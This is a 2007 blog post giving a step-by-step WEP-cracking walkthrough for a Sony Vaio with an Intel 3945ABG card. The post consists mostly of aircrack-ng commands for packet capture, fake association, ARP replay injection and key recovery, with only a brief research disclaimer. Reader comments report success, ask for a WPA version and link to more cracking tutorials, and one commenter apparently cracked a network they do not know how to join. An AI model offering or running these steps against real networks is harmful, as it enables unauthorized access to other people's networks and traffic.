Tuesday, August 28, 2007

HOWTO Crack WEP - Sony Vaio

Based on a professional need, I had to demonstrate that WEP can be cracked. Even though I 'knew' this could be done, I never actually did it myself.

Note: This is only for researching, learning, and security checking purposes. This shouldn't be used to crack networks owned by other people. To attack and to vulnerate networks (or other resources) is bad, and illegal.

Doing some research, I found that my Sony Vaio VGN N350FE wireless card (an Intel 3945ABG), didn't allow certain things from linux, among them one necessary to demonstrate this vulnerability.

If you read my previous posts, you'll see that this is not the first problem I find with hardware.

Also it isn't the first I find a solution for :-)

I found a howto at http://foro.seguridadwireless.net/index.php?topic=3227.0 that I used as a base.

Next, the steps I followed to crack WEP.

We need a linux distribution availabe at http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. We download the CD image and we burn it.

We boot the notebook with WifiWay (it must be able to boot from optical drives).

Once started, we open the X:


We set the channel of the AP (Access Point) in the NIC.

echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel

We get the BSSID, the channel and the ESSID.

airodump-ng rtap0

We finish the execution with CONTROL-C, and we set the BSSID (an HEX number with 6 positions) in the NIC.

echo 'AP_BSSID' > /sys/class/net/wifi0/device/bssid

Once we do this, we start capturing.

airodump-ng -c CAPTURE_CHANNEL -w CAPTURE_FILE rtap0

We open a new window and we set speed at 2 mbps:

echo '2' > /sys/class/net/wifi0/device/rate

We activate the nic.

ifconfig wifi0 up

We look for our MAC address, it's the first 12 numbers stated in HWaddr


We initiate an association with the AP.

aireplay-ng -1 0 -a AP_BSSID -h MAC_ADDRESS_WIFI -e AP_ESSID wifi0

We open another terminal and we start injecting traffic:.

aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h MAC_ADDRESS_WIFI wifi0

This should incremente the number of data in the capture window (it takes a while before it starts incrementing).

When we have over 100.000, we may extract the key by executing:

aircrack-ptw CAPTURE_FILE.cap

This should give us the key in hex format.

I hope this is useful to you.

Technorati tags: , , , , , ,


Versión en español


Anonymous said...

Hi there! I have a que: your OS is windoze and you actually dine that under linux distributive, do I got it right?

Sebastián Stucke said...

my OS is not windows: it is Ubuntu.
you may have windows, or other Linux distros, it doesn't matter because you'll use the live cd, and it will load a Linux distro with all the tools needed.
I hope this helps. Tell me how it goes.


vaio owner said...

Is this a no client attack? What about deathu attacks?

I have been tring ipwraw on my fiesty system for two days with little progess. Cant wait to try wifi and your howto

vaio vgn owner said...

I ran the live cd of wifiway 0.8 and your how to, it worked perfect!!

Would you consider doing a similar HOWTO for WPA?

Sebastián Stucke said...

hi vaio vgn owner
I'm glad to hear that you were able to successfully run the howto!
I am considering writing a howto for cracking wpa, but till now I hadn't had time.
If you want me to notify you when I write it, leave me a message with your email (I won't publish it).
Cheers mate!

mitso said...

hi sebastian,
i've tried your howto guide with wifiway 08 on my sony vaio with OS Vista and... it doesnt works

if I type airodump-ng rtap0 the answer is: rtap0 is not a newtwork interface

could you help me?

Sebastián Stucke said...

Hi Mitso
What Vaio model are you using? I'm using a VGN-N350FE.
I'll need more info from your system:
Please send me the results of:
We'll try to figure out what's going on.
Cheers mate!

iqbal said...

weird thing happens for me, i'm using wifiway .8 and i can do everything when no errors. i'll usually go:
load (which loads ipwraw) and then your steps, but when aireplay is running, its gets no ARG requests, which i assume means injection isn't working. (i have a ipw3945 if that helps)


iqbal said...

I'm using wifiway .8 and ipw3945

I've tried using the 'load' command/script (loads ipwraw drivers i believe)
then i use your steps
everything runs fine, except when aireplay is running, i get no ARG's whatsoever. Any ideas?


Sebastián Stucke said...

Hi Iqbal,
I don't know the 'load' command you are mentioning.
Did you try to follow this howto step by step from scratch?
This howto is meant to work with the ipw3945, so you should have no problems.
Please tell me how it goes.

Good luck!

Anonymous said...

I figured it out.
On the newest wifiway (.8) you can just type 'airoway.sh' and its pretty much automated. as far as i know, that only works for ipw3945, i think there is something called airoscript for other cards

Anonymous said...

hi sebastian, pls can you help me out i got no wi-fi on my computer pls can you help me to crack wep keys on my psp pls!!!pls email me on da504@hotmail.com

Anonymous said...

Hi sebstain,

Thansk and it worked, simple and easy.

Ricky said...

I did exactly what your walkthrough said and worked great and i got a HP Intel Centrino Duo IPW3945 Chipset. Took me a little while where i was a virgin at the Linux OS but other than that worked great thanks man..

Anonymous said...


I'm having the same problem as iqbal, that is I get no ARP requests, so no packet to replay and consequently no packet injection. The association works fine, though. Any ideas?

I followed your how-to to the letter, using version 0.8 and ipw3945 (Vaio machine).


Sebastián Stucke said...

Hi Jim,
One question: are you trying to break your own network? or someone else's?
If it is some else's network, it could be they are filtering by mac-address.
Please note this article is for research, learning, and security checks only. I don't encourage breaking into other people's resources.

Erik Gustafsson said...

hi, i've found a guide for how to use the automated airoway.sh (you type it in the terminal) at http://ctorrecillas.blogspot.com/2007/11/wep-decryption.html . might be something to check out to help you out. it's force wifiway 0.8

Anonymous said...


It is my own network, so I already know everything (WEP 128-bit, no MAC filtering). I am just doing this for fun.

When I connect a client to my AP (from another laptop) after having started the attack, everything works fine. I only get this problem when I try it without having a "real" client.

Is there a way to do it without connecting a client?


Anonymous said...

Hi im a fresh linux user but with help of you i managed to get password to wifi network. Unfortunetly i have no idea how to use this password now to connect to network. Please help me out. Let me know what kinde of commend i need to run. i got wifiway 0.8, intel pro 3945 --> wifi0. thanks for help

Dimon said...

I tried this on Sony Vaio vgn-tx2hp.
airodump-ng rtap0 works fine.
But I can't run for example echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel
simply because there is no wifi0 folder on my disk.
Is this because Sony Vaio NIC doesnt support this?
Maybe I should plug PCMCIA WiFi card?
I'm new to this and any help appreciated


Sebastián Stucke said...

This howto whas written using Wifiway 0.6
I cannot guarantee it will work with other versions!
Please try to download an use wifiway 0.6

Anonymous said...

This works GREAT with my Dell Inspirion 6400.


Now I just need to figure out how to crack WPA with this thing...

Anonymous said...

I used wifiway 0.8 with the airoway.sh script and it worked with ipw3945. Thanks!

ahmed saud tahir said...

hi man i have vaio vgn fj57gp with intel(R) PRO/Wireless 2200BG card. the method u mentioned here would it work for this card?? as far as i came toknow frommy research over the net that this card has jus one mode:(

Anonymous said...

awesome tutorial. just one thing to add..

when i was trying my luck, i had extremely frustrating time with getting the network adapter into the monitor mode. i have the Intel PRO Wireless 3945ABG card too, and neither madwifi or mac802 worked for me. but eventually i discovered that the ipwraw-ng driver worked fine with my card. the two pages below were of great help to me if anyone is interested

How to crack WEP with Intel PRO/Wireless 3945ABG

How to crack WEP encryption (wifi security)


find tutorial cracking wireless use windows+vmware+usb wifi here >>TUTORIAL CRACK WIRELESS USE WINDOWS<<


Tthanks dude,today i just cracking wep in windows.take a few minute for get the ket.very2 easy technique.i use usb wifi for alternative because my built in broadcom problem to inject.i just find tutorial at http://wireless-security-system.blogspot.com